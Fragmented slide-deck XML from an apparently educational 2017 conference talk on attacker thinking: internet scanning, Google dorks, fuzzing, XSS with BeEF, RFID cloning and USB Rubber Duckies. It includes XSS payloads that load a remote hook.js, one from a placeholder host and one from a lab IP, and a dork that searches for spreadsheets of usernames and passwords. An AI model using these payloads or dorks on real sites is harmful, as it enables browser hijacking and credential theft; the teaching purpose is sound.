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33"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="298" r:id="rId5"/>
    <p:sldId id="263" r:id="rId6"/>
    <p:sldId id="315" r:id="rId7"/>
    <p:sldId id="275" r:id="rId8"/>
    <p:sldId id="297" r:id="rId9"/>
    <p:sldId id="307" r:id="rId10"/>
    <p:sldId id="270" r:id="rId11"/>
    <p:sldId id="271" r:id="rId12"/>
    <p:sldId id="268" r:id="rId13"/>
    <p:sldId id="299" r:id="rId14"/>
    <p:sldId id="280" r:id="rId15"/>
    <p:sldId id="274" r:id="rId16"/>
    <p:sldId id="272" r:id="rId17"/>
    <p:sldId id="264" r:id="rId18"/>
    <p:sldId id="279" r:id="rId19"/>
    <p:sldId id="261" r:id="rId20"/>
    <p:sldId id="265" r:id="rId21"/>
    <p:sldId id="262" r:id="rId22"/>
    <p:sldId id="267" r:id="rId23"/>
    <p:sldId id="308" r:id="rId24"/>
    <p:sldId id="313" r:id="rId25"/>
    <p:sldId id="288" r:id="rId26"/>
    <p:sldId id="314" r:id="rId27"/>
    <p:sldId id="287" r:id="rId28"/>
    <p:sldId id="289" r:id="rId29"/>
    <p:sldId id="310" r:id="rId30"/>
    <p:sldId id="286" r:id="rId31"/>
    <p:sldId id="2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72"/>
    <p:restoredTop sz="70814"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="82" d="100"/>
          <a:sy n="82" d="100"/>
        </p:scale>
        <p:origin x="7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384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E8199-A4E4-F440-AD2D-5AE9ABCE027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5BDDA-9CAE-9B4E-AB2A-651B49B83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8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2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these coffee shops has a VNC server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7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Successful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live and die by their fuzzing strategies. If the changes made to the input file are too conservative,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fuzzer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achieve very limited coverage. If the tweaks are too aggressive, they will cause most inputs to fail parsing at a very early stage, wasting CPU cycles and spewing out messy test cases that are difficult to investigate and troubleshoot.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AFL: Measure what types of changes to the input file actually result in the discovery of new branches in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82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Pretty Theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fake Notification bars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Replace HREFs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Browser redirect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Clippy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71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Pretty Theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fake Notification bars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Replace HREFs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Browser redirect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Clippy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8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96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0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95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13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64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7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"one ought to design systems under the assumption that the enemy will immediately gain full familiarity with them"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73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5BDDA-9CAE-9B4E-AB2A-651B49B837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5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5613385"/>
            <a:ext cx="1569194" cy="7429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C07ED-CC46-874E-8B2B-087D46D1CE0A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03127-6632-6B48-BB52-99F3B1204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363"/>
            <a:ext cx="12192001" cy="6866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spc="100" dirty="0" smtClean="0">
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="Lato Light" charset="0"/>
                <a:cs typeface="Lato Light" charset="0"/>
              </a:rPr>
              <a:t>Thinking Like a Hacker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CodeMash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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0462972" y="185518"/>
            <a:ext cx="1569194" cy="7429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8898" y="6488668"/>
            <a:ext cx="212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January 5, 2017 v1.0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2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in the World is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Attackers Find Stuff on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One: Learning to Discover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internet, the whole thing, is being scanned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Through Obscurity is an old concept and offers little protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Social media, VPSs, services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>… it’s all out there and searchable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Shodan.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Censys.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MassScan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t> all tools to map the internet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68346"/>
            <a:ext cx="7509933" cy="1006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33" y="4610201"/>
            <a:ext cx="5799667" cy="17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6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Shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: A Trip to Campinas, Brazil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15" y="1413986"/>
            <a:ext cx="4819185" cy="4369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5308727" cy="3816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154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Hu-Mongo-us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618" y="1474494"/>
            <a:ext cx="5853887" cy="502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23" y="1474494"/>
            <a:ext cx="2970001" cy="380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505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Black Magic: Search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engines can be used to locate web portals, admin pages, and other hidden/unlinked pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google offers many options:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>site:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>intitle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filetype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inurl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ext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4612746"/>
            <a:ext cx="6540500" cy="11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342079" y="4108477"/>
            <a:ext cx="3566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filetype:xls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> "username | password"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14006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That Happen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-I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Attackers Break Stuff on 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Charting the Unknown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a target is found, enumeration is the key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Like the discovery already covered, but this also applies to applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Know as much as possible about a target, assuming nothing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ideas are formed from the data, not preconceived ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We ask </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>questions, all of them!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Review of terms:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fuzzing:	Providing invalid, random, and unexpected data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Brute-force: 	Guessing until input is accepted, usually a password.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Fuzzing &amp; Brute-forcing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QA engineer:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Orders </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a beer. Orders 0 beers. Orders 999999999 beers. Orders a lizard. Orders -1 beers. Orders a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sfdeljknesv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attacker:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Orders a beer. Evaluates how the bartender responds. Orders a ‘. Orders a ”&gt;&lt;script&gt;alert(1)&lt;/script&gt;. Orders a %3cscript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>someurl.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/hook.js%3e%3c/script%3e.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860800"/>
            <a:ext cx="2590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Bunnies &amp; Crashing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through all branches of code with brute-force</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apply intelligence to uncover more branches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Fuzzers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American Fuzzy Lop (AFL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Burp Intruder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WSFuzzer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for SOAP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157" y="2878667"/>
            <a:ext cx="4577644" cy="3433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/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4995333" y="3471333"/>
            <a:ext cx="155786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1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Humble Cross-Site Scripting (XSS)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underestimated and just as often poorly explained</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“&lt;script&gt;alert(1);&lt;/script&gt;”? So what?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript is executed client-side by the browser, which means:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is not a danger to a web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> a danger to users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>#3 in the OWASP Top 10 for a reason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582" y="3457575"/>
            <a:ext cx="4461218" cy="2719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041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Chris Maddalena</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Consultant/Penetration Tester</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Where to find me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cmaddalena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chrismaddalena</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CodeMash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2016 speaker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What to Expect From a Penetration Test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624" y="1690688"/>
            <a:ext cx="3635644" cy="3635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84161" y="3635534"/>
            <a:ext cx="365760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398" y="3234190"/>
            <a:ext cx="33852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Harder: XSS Can Do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89875" cy="3760788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can do a lot of things that we can abuse:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Play sounds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Check a laptop’s battery status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Steal cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Redirect the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Capture web cam images</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Modify all HREFs to point to whatever we want</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Think we can fit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of that functionality into an XSS payload?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075" y="1825625"/>
            <a:ext cx="2911475" cy="2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BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>: B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>xploitation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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tool for exploiting XSS and “hooking” browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Hooks” a browser using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BeEF’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hook.js</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Uses that JavaScript to interact with the host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Collects system and browser information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Allows for on-demand execution of JS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also supports mobile browsers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733" y="88106"/>
            <a:ext cx="1879600" cy="187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161" y="3529013"/>
            <a:ext cx="4221906" cy="264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2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BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Demo: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762947" cy="453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574671" y="3405227"/>
            <a:ext cx="4853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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=http://192.168.228.1:3000/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hook.js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2776654" y="5887844"/>
            <a:ext cx="2419814" cy="339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4871652" y="3785710"/>
            <a:ext cx="2766933" cy="21084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4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Lesson: JavaScript Can Do More Than Should Ever Be Allowed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631" y="1588030"/>
            <a:ext cx="3862738" cy="45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6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looked at discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We looked at how a new discovery can be mapped and abused</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We looked at how a discovered vulnerability can be exploited to harm users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What if we can just walk up to someone or their computer?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2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Up Close &amp; Personal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Team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with RFID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RFID cards work because a device can read them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only logical we can create a device to read a card and replay it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cloners, like this Proxmark3, read the card like the door</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kind of like when they make your hotel room card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xcept a read instead of a write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defeated using its own basic elements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25" y="3852863"/>
            <a:ext cx="4133775" cy="232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10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Trusting HIDs &amp; Ducks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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>what they are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>told</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>USB devices can contain nasty things</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So USB devices may be disallowed entirely or disallowed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>autorun</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But disallowing all USB is impossible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Computers trust Human Interface Devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>USB keyboard? OK!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Rubber Duckies”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Look like a USB drive, act like a HID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488" y="3911600"/>
            <a:ext cx="4027312" cy="2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HIDs Can’t Execute Malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0"/>
              <a:t>… Right?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Rubber Duckies don’t execute files, they type!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>At super human speeds!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Ducky can type lines of code, execute commands, and download files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The computer thinks it’s a human typing on a dumb keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It even works on Android devices, seriously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367" y="4485412"/>
            <a:ext cx="4017433" cy="1691551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>
            <a:off x="3627967" y="4485412"/>
            <a:ext cx="3708400" cy="1204188"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 6187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6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Quackery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83" y="1690688"/>
            <a:ext cx="10011833" cy="42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“Red Team”?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29518" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A concept evolved from the Catholic Church’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Promoter of the Faith </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AKA: “Devil’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dvocate”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“One </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>who "argued against the canonization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a candidate in order to uncover any character flaws or misrepresentation of the evidence favoring canonization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Adapted by the U.S. military creating Red vs. Blue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>University of Foreign Military and Cultural Studies (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>UFMCS)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718" y="1825625"/>
            <a:ext cx="2386082" cy="3534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22" y="5382827"/>
            <a:ext cx="4517756" cy="7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Red Team Example &amp; Wrap-up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world case study</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Tools we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>used:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Rubber Duckies”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RFID card cloners, and;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>My phone</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10256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Any 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425"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4437069" y="1825625"/>
            <a:ext cx="3317862" cy="4389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92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Red Team: Promoters of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Uncover security misconfigurations, flaws, and oversights</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Make a case for why they should be fixed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The job is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>lot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of report writing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Assemble an analysis of the potential threats and risks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Often involves actually carrying out the attack(s)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71660" y="-1"/>
            <a:ext cx="4520339" cy="603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Mindset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mindset shared by defender and attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Good at asking questions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Think “Outside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the Box” is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cliché, but true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Break the supposed rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Look at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the thing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>plainly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pick it apart to view its basic elements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85" y="1825625"/>
            <a:ext cx="2984715" cy="29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31699"/>
            <a:ext cx="12192000" cy="91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 Teaming is Like Quality Assurance++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“You’re </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a glorified QA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tester”                                                                           -- Jimmy </a:t>
